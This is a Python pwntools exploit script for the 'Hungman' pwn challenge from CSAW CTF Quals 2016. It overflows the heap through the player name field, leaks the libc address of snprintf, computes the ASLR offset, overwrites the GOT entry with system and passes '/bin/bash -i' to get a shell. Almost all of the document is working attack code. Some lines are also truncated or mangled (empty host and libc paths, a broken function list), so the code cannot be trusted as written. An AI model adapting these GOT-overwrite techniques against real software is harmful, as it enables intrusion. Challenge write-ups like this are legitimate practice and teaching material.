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Created July 31, 2019 02:23
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Exploit for [PWN 300] Hungman from CSAW CTF Quals 2016
#!/usr/bin/env python
from pwn import *
import sys
debug_server = False
use_system_libc = True
r = remote("", 8003); use_system_libc = False
# r = process("./hungman")
# r = process("./linux_serverx64"); debug_server = True
# Load libc
if use_system_libc:
libc = ELF("/lib/x86_64-linux-gnu/")
libc = ELF("./")
# Load program
exe = ELF("./hungman")
got_funcs = [
# "free",
# "puts",
# "write",
# "__stack_chk_fail",
# "strchr",
# "printf",
got_start =[got_funcs[0]]
g_highscore_message = 0x602100
def recvline(r):
line = r.recvline()
print("recvline(%r)" % line.rstrip())
return line
def sendline(r, line):
print("sendline(%r)" % line)
return r.sendline(line)
def get_highscore(r, charset="abcdefghijklmnopqrstuvwxyzX"):"Playing hangman")
# Get an initial high score
for c in charset:
data = r.recv()
print("recv(%r)" % data)
if "High score! change name?" in data:
sendline(r, c)
# Allow the debugger to attach
if debug_server:
print(r.recvuntil("What's your name"))
raw_input("Press enter to start...")
# Give initial name
recvline(r) # What's your name?
name = "A"*0x80 # +1 for \0
sendline(r, name)
recvline(r) # Welcome, name
# Get high score to change name
get_highscore(r, charset="abXXXXXXX")
# Change name to be longer
sendline(r, 'y')
# Build new struct hangman_game
name += "B"*0x10 #filler heap space before struct
name += "HACK" #score
name += p32(8) #name_size
name += p64(["snprintf"]) #name
# Send new name
sendline(r, name)
# Read leaked snprintf addr
data = r.recv()
print("recv(%r)" % data)
snprintf_addr_str = data[len("Highest player: "):]
snprintf_addr_str = snprintf_addr_str[:snprintf_addr_str.find(" score")]
snprintf_addr_str += "\0" * (8-len(snprintf_addr_str))
print("snprintf_addr_str: %r" % snprintf_addr_str)
snprintf = u64(snprintf_addr_str)"Leaked address of snprintf: 0x%08x" % snprintf)
# Calculate ASLR slide
aslr = snprintf - libc.symbols["snprintf"]
# Continue?
sendline(r, 'y')
# Play again
# Change name so got[snprintf] = system
sendline(r, 'y')
# Replace snprintf with system
name = p64(libc.symbols["system"] + aslr)
# Make sure other got entries are the same
for sym in got_funcs[1:]:
addr = libc.symbols[sym] + aslr if sym in libc.symbols else 0
name += p64(addr)
# Write zeros until we get to g_highscore_message
pos = got_start + 8 * len(got_funcs)
name += (g_highscore_message - pos) * "\0"
# Write command to pass to system
name += "/bin/bash -i\0"
# Send new name to trigger exploit
sendline(r, name)
# Get that shell, y0
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